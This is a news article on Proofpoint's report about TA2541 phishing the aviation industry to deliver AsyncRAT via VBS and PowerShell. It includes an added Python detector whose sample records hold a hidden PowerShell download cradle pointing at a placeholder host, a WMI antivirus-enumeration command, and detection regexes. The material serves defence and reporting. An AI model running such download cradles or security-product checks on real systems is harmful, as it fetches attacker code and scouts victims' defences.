Threat actor TA2541 targets aviation industry to distribute AsyncRAT

Researchers from Proofpoint have spotted an advanced persistent threat actor (APT) dubbed TA2541 that has been targeting entities in the aviation industry to distribute AsyncRAT malware.

Proofpoint has tracked the threat actor since 2017 and has observed TA2541 using similar methods to target victims and then distribute remote access trojans (RATs), such as its recent malware choice AsyncRAT, which are used to remotely control compromised systems.

“TA2541 uses themes related to aviation, transportation, and travel. When Proofpoint first started tracking this actor, the group sent macro-laden Microsoft Word attachments that downloaded the RAT payload. The group pivoted, and now they more frequently send messages with links to cloud services such as Google Drive hosting the payload,” Proofpoint wrote in the blog post.

TA2541 attack chain

Proofpoint described the TA2541 attack chain in Figure A below:

Figure A: TA2541 attack chain (Proofpoint)

As shown in the attack chain, the actors embed Google Drive URLs in transportation-themed phishing emails; the links lead victims to Google Drive, where malicious VBS files are hosted.

Proofpoint added that OneDrive is occasionally used to host the malicious files as well. In late 2021, the researchers also observed the use of DiscordApp URLs, a popular content delivery network (CDN) that is also abused by bad actors, linking to a compressed file that led to either AgentTesla or Imminent Monitor.

Once executed, the VBS file invokes PowerShell to pull an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub.

“The threat actor executes PowerShell into various Windows processes and queries Windows Management Instrumentation (WMI) for security products such as antivirus and firewall software, and attempts to disable built-in security protections,” Proofpoint added.

In the next stage, the APT actors collect system information before downloading AsyncRAT onto the victim’s system. Other popular RATs that may be used include NetWire, WSH RAT, and Parallax.
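The chain described above (script host launching PowerShell, PowerShell pulling a payload from a text-hosting service, then WMI queries for installed antivirus and firewall products) is the kind of sequence a defender can flag in process-creation telemetry. The following is an added example, not code from Proofpoint or from the article: it runs simple detection logic over constructed Sysmon-style records. The record layout, the hostnames and the token list derived from the services named in the article are all assumptions to be tuned against real telemetry.

```python
"""Added example: flag the TA2541-style delivery chain in process-creation telemetry.

The events below are constructed Sysmon-style records (parent image | image |
command line), not real logs. Host tokens come from the services the article
names; treat them as a starting list to tune, not a complete indicator set.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Assumption: URLs for the named text-hosting services contain these tokens.
TEXT_HOSTING_TOKENS = ("pastetext", "sharetext", "github")

# Common PowerShell download primitives; any one of them plus a text-hosting
# token is the "pull an executable from a hosted text file" step.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I,
)

# WMI namespace/classes used to enumerate installed AV and firewall products.
SECURITY_WMI = re.compile(r"antivirusproduct|firewallproduct|securitycenter2", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'parent|image|cmdline' record."""
    parent, image, cmd = line.split("|", 2)
    return ProcEvent(parent.strip(), image.strip(), cmd.strip())


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the detection labels that apply to one event."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line.lower()
    findings: List[str] = []
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        # VBS handed off to PowerShell (the chain's second stage).
        findings.append("script_host_spawned_powershell")
    if child in POWERSHELL and DOWNLOAD_CRADLE.search(cmd) and any(
        tok in cmd for tok in TEXT_HOSTING_TOKENS
    ):
        findings.append("powershell_download_from_text_hosting")
    if child in POWERSHELL and SECURITY_WMI.search(cmd):
        findings.append("wmi_security_product_enumeration")
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map record index -> findings for every record that triggered something."""
    results: Dict[int, List[str]] = {}
    for idx, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            results[idx] = hits
    return results


def chain_observed(results: Dict[int, List[str]]) -> bool:
    """True when both the download stage and the AV/firewall check were seen;
    the pairing is what is worth escalating, since either alone is noisy."""
    seen = {label for hits in results.values() for label in hits}
    return {"powershell_download_from_text_hosting", "wmi_security_product_enumeration"} <= seen


# Constructed sample records (not real telemetry); hostnames are placeholders.
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\u\Downloads\Flight_Details.vbs",
    r"C:\Windows\System32\wscript.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -NoP -W Hidden -c (New-Object Net.WebClient).DownloadString('https://pastetext.example/raw/PLACEHOLDER')",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -c Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c Get-ChildItem C:\Temp",
]

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for idx, labels in hits.items():
        print(idx, labels)
    print("chain observed:", chain_observed(hits))
```

The benign records (a user opening a script and an interactive directory listing) produce no findings, while the two stages the article describes are labelled individually and then correlated by `chain_observed`. In practice the correlation would be keyed on host and a time window rather than on one flat list.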

Proofpoint concluded “with high confidence this threat actor will continue using the same TTPs observed in historic activity with minimal change to its lure themes, delivery, and installation,” as well as continue using AsyncRAT, vjw0rm, and other commodity malware in future campaigns.

Other recent RAT campaigns

This past January, the Cisco Talos cybersecurity team also discovered a malicious campaign delivering RAT variants, including NanoCore, NetWire and AsyncRAT, that target users’ information.

According to Cisco, the threat actor leveraged public cloud services (such as AWS or Azure) to deploy and deliver variants of commodity remote access trojans (RATs) with information-stealing capabilities, starting around Oct. 26, 2021. Campaign victims are primarily distributed across the United States, Italy and Singapore.